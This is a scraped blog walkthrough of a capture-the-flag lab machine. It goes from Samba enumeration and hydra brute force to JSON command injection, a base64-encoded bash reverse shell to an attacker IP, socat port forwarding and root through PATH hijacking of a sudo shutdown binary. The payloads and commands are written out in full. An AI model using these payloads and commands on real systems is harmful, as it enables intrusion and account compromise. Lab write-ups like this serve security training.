.png)
4 months ago
22 BOOK THIS SPACE FOR AD
ARTICLE AD
We are here with a new attack scenario. In this challenging scenario, we will defeat the machine in front of us by using our quick wit and penetration methodologies.
Even if we cannot find many open ports on the target machine, we will improve our penetration capabilities using the evidence and information we have.
If you’re ready, let’s start, cyberpunks!
First of all, save the file locations of the wordlists and IPs that you will use most on the shell as constant values. Then define the IP of the target machine to the local DNS using the /etc/hosts file.
These definitions increase your processing speed and prevent confusion when typing complex commands.
Now you can move on to the discovery phase.
Using our Nmap tool, we can reveal the network and system structure of the target machine: nmap -sV -sC -oN nmap_result.txt -T4 -A --script=vuln -Pn -F $target_ip
-sV:Service Version Detection: Probes open ports to determine what service and version are running.-sC:Default Scripts: Enables the use of the default set of nmap scripts. These scripts perform various tasks, such as version detection and basic vulnerability checks.-oN nmap_result.txt:Output to Normal File: Saves the scan results in normal output format to the specified file (nmap_result.txt).-T4:Timing Template: Sets the timing template to 4 (Aggressive), speeding up the scan by reducing wait times between probe transmissions.-A:Aggressive Scan Options: Enables several advanced and aggressive scan options, including OS detection, version detection, script scanning, and traceroute.--script=vuln:Vulnerability Scripts: Runs a set of nmap scripts specifically designed to check for known vulnerabilities on the target.-Pn:No Ping: Disables the ping scan. nmap will not try to ping the target hosts before scanning. Useful for scanning hosts that do not respond to ping requests (ICMP).-F:Fast Mode: Scans only the most common 100 ports instead of all 65535 ports, making the scan faster.As you can see, we have obtained advisory CVE notes, version and open port information.
80/tcp — http139/tcp — netbios-ssn Samba445/tcp — netbios-ssn SambaAlways note version information and relentlessly conduct exploit research on them in a real scenario.
Port 80 — HTTP (HyperText Transfer Protocol)
Description: HTTP is the protocol used for transmitting web pages on the internet. When you access a website via your web browser, you are typically using HTTP on port 80.Usage: Primarily used by web browsers to retrieve web pages from web servers. This protocol is also used by many web services and APIs.Security: HTTP does not encrypt the data it transmits, making it vulnerable to eavesdropping and man-in-the-middle attacks. For secure communication, HTTPS (HTTP Secure) is used on port 443.Common Commands: Accessed through web browsers or tools like curl and wget.Port 139 — NetBIOS Session Service (netbios-ssn)
Description: NetBIOS Session Service allows applications on different computers to communicate within a local area network (LAN) and supports functions such as file sharing and printer sharing.Usage: This port is used by SMB (Server Message Block) protocol for network file sharing. Samba, an open-source implementation of the SMB protocol, also uses this port for network communication.Security: Port 139 is often targeted for exploits due to its role in file and printer sharing. It is recommended to restrict its use to trusted networks and to secure it using firewalls and network segmentation.Port 445 — SMB over TCP (Samba and NetBIOS-ssn)
Port 445 is used by the Server Message Block (SMB) protocol, which facilitates file sharing, printer sharing, and other network services between nodes on a network. This port allows SMB to operate directly over TCP/IP without the need for the NetBIOS layer, making it distinct from NetBIOS-SSN (port 139).Samba is an open-source implementation of the SMB/CIFS protocol, enabling interoperability between Unix/Linux and Windows systems.We saw where we can start our attack surface.
Discover what application is running on HTTP 80 port.
When the connection is established, it requests direct authorization from us. Let’s see if we can bypass this and get other information by using the wget tool.
There is a 401 code… We need a login credential.
It’s time to perform an enumerate operation via Samba. There are different approaches for this, but the following two commands may be sufficient for you.
enum4linux -a $target_ipsmbclient -L //10.10.151.213Let’s test the smbclient tool and get shares information.
Try to connect to the share named “yotf”: smbclient //10.10.151.213/yotf
Access denied. It was worth a try…
Now you can switch to enum4linux tool for enumeration.
We find 2 valid users:
foxrascalNote these usernames and move on to the next brute force stage.
The application over HTTP asked us for authorization. We must perform a brute force attack using the wordlist for passwords and our usernames we have. There are various tools for this. You can try this approach either via hydra for web or metasploit for SMB.
For web:
hydra -L /root/Desktop/user_fox.txt -P /usr/share/wordlists/rockyou.txt ourtargetsite.thm http-head /The “http-head” method does not work on some servers, if in doubt, choose the “http-get” method.
hydra -L /root/Desktop/user_fox.txt -P /usr/share/wordlists/rockyou.txt ourtargetsite.thm http-get /In addition, you can choose hydra by giving a unique username.
Surely one of these will give you results.
We got the password for web.
For SMB:
Try via msfconsole. Run with msfconsole -q command.
Just run.
Once a login credential is successful, this process will stop and you will receive the password. The process takes time depending on the length of the wordlist, remember that.
As you can see, we have the password for user “fox”.
Check this source for SMB: https://book.hacktricks.xyz/network-services-pentesting/pentesting-smb
Additionally you can use the following command: crackmapexec smb ourtargetsite.thm -u /root/Desktop/user_fox.txt -p /usr/share/wordlists/rockyou.txt
Now let’s log in via SMB: smbclient -L \\ourtargetsite.thm -U fox -t 500
As you can see, we have gained connection. You can go into detail and access it via share.
Try: smbclient \\\\10.10.151.213\\yotf -U fox -t 500
Now we see the files. Take these to your local. We use get for this.
Check their content.
A hashed entry… Take note of these, maybe they will be useful.
Now let’s try connecting via the web by using credential for user “rascal”.
There is a search field. Every point with input should attract you.
Remember, you have infiltrated the system, now you can manage this user’s system operations. Let’s search for some files, maybe it will help.
File names have arrived… A command is running in the background. Do some more tries.
It looks like a keyword-based retrieval operation… Just try some command.
It didn’t happen like this… We have to discover this mechanism through Burp.
We may need to bypass.
We are transmitting a payload in the form of JSON. Check out this resource: https://riptutorial.com/javascript/example/32217/evaled-json-injection
Try this:
{"target":"\";pwd \""}Wow! When we make a manipulation through the pattern, it is possible to inject a command.
Think about it and try it yourself.
Let’s check id:
{"target":"\" ;/usr/bin/id\n"}Who am I?
{"target":"\" ;/usr/bin/whoami\n"}As you see, anything is possible.
Now we need to browse the file directories:
{"target":"\" \n/bin/ls -al\n"}{"target":"\" \n/bin/cd ..\n"}
Get flag with:
{"target":"\" \ncat ../../../web-flag.txt\n"}Now we need to try to get a reverse shell, this mechanism can allow this.
Since we will inject this into a bash environment, we must convert our command to Base64 format. The command we will use:
bash -i >& /dev/tcp/10.10.50.174/12244 0>&1bash -i:This starts an interactive instance of the Bash shell. The -i flag ensures that the shell is interactive.>& /dev/tcp/10.10.50.174/12244:This redirects both standard output (stdout) and standard error (stderr) to a TCP connection to the IP address 10.10.50.174 on port 12244. The /dev/tcp/ feature is a special file that Bash uses to enable TCP connections.0>&1:This redirects standard input (stdin) to the same TCP connection, effectively sending the input from the remote machine back to the local shell.Check this resource for reverse shell: https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-reverse-cheatsheet/#tools
Let’s convert to Base64:
echo -n "bash -i >& /dev/tcp/10.10.50.174/12244 0>&1" | base64This is the equivalent: YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC41MC4xNzQvMTIyNDQgMD4mMQ==
Before transmitting this, put your machine in listening mode via the port you specified: nc -nlvp 12244
Again, let’s transmit this payload to the target via Burp:
{"target":"\";echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC41MC4xNzQvMTIyNDQgMD4mMQ== | base64 -d | bash; \""}Send it.
We got the connection!
Check out the .php script that makes this command injection possible.
Did you see that:
exec("find ../../../files/* -iname \"*$target->target*\" | xargs");To identify the binary system and obtain information: dpkg --print-architecture
We have amd64.
You must send a request to your own HTTP server via the hijacked shell, specifying the target file: wget http://10.10.50.174:8000/linpeas_linux_amd64
But before you do this, check the permissions: find / -type f -perm /4000 2>/dev/null
find /:
This starts the find command from the root directory (/) and searches recursively through all directories and subdirectories.-type f:
This option specifies that find should look for files only. It ignores directories, symlinks, and other types of filesystem objects.-perm /4000:
This option tells find to look for files with the setuid bit set. The setuid bit (represented by the octal value 4000) allows a file to be executed with the privileges of the file's owner.The / before 4000 is used to match files that have any of the permission bits in 4000 set. Without the /, find would look for files with exactly 4000 permissions, but with the /, it matches files that have at least the setuid bit set, in combination with any other permissions.2>/dev/null:
This redirects any error messages (such as “Permission denied” errors) to /dev/null, effectively discarding them. This makes the output cleaner and easier to read.To find out which file locations a user has read-write permissions:
We’re not surprised, there is full authority over “/tmp”. Download LinPeas here.
We have it now.
We need to grant execution permission: chmod +x linpeas_linux_amd64
Now let’s run this tool:
The output of this can be quite long. Be patient and examine them all.
You have seen the SSH port open on the local without external access.
You’ve seen the CVE notes and the permissions approaches you can use.
There are interesting files…
Check these files:
We have another Base64 format text: LF5GGMCNPJIXQWLKJEZFURCJGVMVOUJQJVLVE2CONVHGUTTKNBWVUV2WNNNFOSTLJVKFS6CNKRAXUTT2MMZE4VCVGFMXUSLYLJCGGM22KRHGUTLNIZUE26S2NMFE6R2NGBHEIY32JVBUCZ2MKFXT2CQ=
Decode it:
echo "LF5GGMCNPJIXQWLKJEZFURCJGVMVOUJQJVLVE2CONVHGUTTKNBWVUV2WNNNFOSTLJVKFS6CNKRAXUTT2MMZE4VCVGFMXUSLYLJCGGM22KRHGUTLNIZUE26S2NMFE6R2NGBHEIY32JVBUCZ2MKFXT2CQ=" | base32 -d | base64 -dOur result is as follows: c74341b26d29ad41da6cc68feedebd161103776555c21d77e3c2aa36d8c44730 -
We will try to get a connection via SSH, but remember this is closed to the open world, so we need a different approach.
Enabling port forwarding using socat allows you to access internal ports on a target machine through ports that are accessible from the outside. This is particularly useful for accessing services running on internal networks or behind firewalls.
Socat (short for "socket cat") is a command-line based utility that establishes two bidirectional byte streams and transfers data between them. It is versatile and can handle many types of communication, including network sockets, serial lines, and file descriptors.
First we need to get Socat AMD64 just like LinPeas. Search for it.
Use it: https://github.com/andrew-d/static-binaries/blob/master/binaries/linux/x86_64/socat
Download on your locale: wget https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat
Transfer to target via your HTTP server.
Again use chmod for file execution permission: chmod +x socat
Quite successful.
Then just use: ./socat tcp-listen:11122,fork tcp:127.0.0.1:22 &
./socat:This runs the socat executable from the current directory. If socat is installed globally, you could just use socat.tcp-listen:11122:This instructs socat to listen on TCP port 11122 for incoming connections.,fork:The fork option allows socat to handle multiple incoming connections by creating a new process for each connection.tcp:127.0.0.1:22:This specifies the target address and port for forwarding. In this case, it forwards the connections to the local SSH server running on 127.0.0.1 (localhost) on port 22.&:The & at the end runs the command in the background, allowing you to continue using the terminal while socat is running.Now we have access to connect from port 11122 to port SSH 22.
Check it with nmap: nmap -sV -p 11122 -oN scan_ssh.txt $target_ip -T4
As you can see, we have SSH port, via port 11122.
Now let’s brute force the user “fox” via SSH: hydra -l fox -P /usr/share/wordlists/rockyou.txt -f -s 11122 10.10.151.213 ssh
-l fox: Specifies the username to use for the brute-force attack. In this case, the username is fox.-P /usr/share/wordlists/rockyou.txt: Specifies the path to the password file to use for the brute-force attack. The rockyou.txt file is a popular wordlist containing millions of passwords.-f: Tells Hydra to stop the attack as soon as a valid password is found (first match).-s 11122: Specifies the port to connect to for the SSH service. The default SSH port is 22, but here it is 11122.10.10.151.213: The IP address of the target machine.ssh: Specifies the service to attack, in this case, SSH.You must be patient.
We have SSH password for fox user.
Let’s connect:
Let’s look directly at the privilege level for user: sudo -l
Interesting… There is a privilege on the “shutdown” binary.
User fox may run the following commands on year-of-the-fox: (root) NOPASSWD: /usr/sbin/shutdown:
This line indicates that the user fox can run the /usr/sbin/shutdown command as the root user without needing to provide a password.You can check this source for bypass binaries methods: https://gtfobins.github.io/
There is no exploit method registered in this scenario…
We need to access the file content.
We cannot check through the target.
Then let’s get it into our own system. Run it via your target: python3 -m http.server
Request “shutdown” file from your own machine.
Analyze it.
Now it’s looking like this binary might just be calling the poweroff binary…
This poweroff can be a command. Let’s test this theory.
If you’re seeing that the poweroff command does not have a specific path when you run strings, it suggests that the executable file for poweroff is likely using the system() or exec() family of functions to execute the poweroff command without specifying an absolute path. When a command like poweroff is executed without a specific path, the system relies on the directories listed in the $PATH environment variable to locate the executable. The $PATH variable contains a list of directories where executable files are located. When you type a command in the terminal, the system searches through these directories in order until it finds the executable.
Do the following in order:
#Create poweroffecho /bin/sh > poweroff
chmod 777 poweroff
export PATH=/tmp:$PATH
Let’s try to run: sudo /usr/sbin/shutdown
You should be careful, if you do not do the steps correctly, the machine will turn itself off.
We are root now!
Don’t give up on hacking.
Code for good.
^-^
Bengali (Bangladesh) · 
English (United States) ·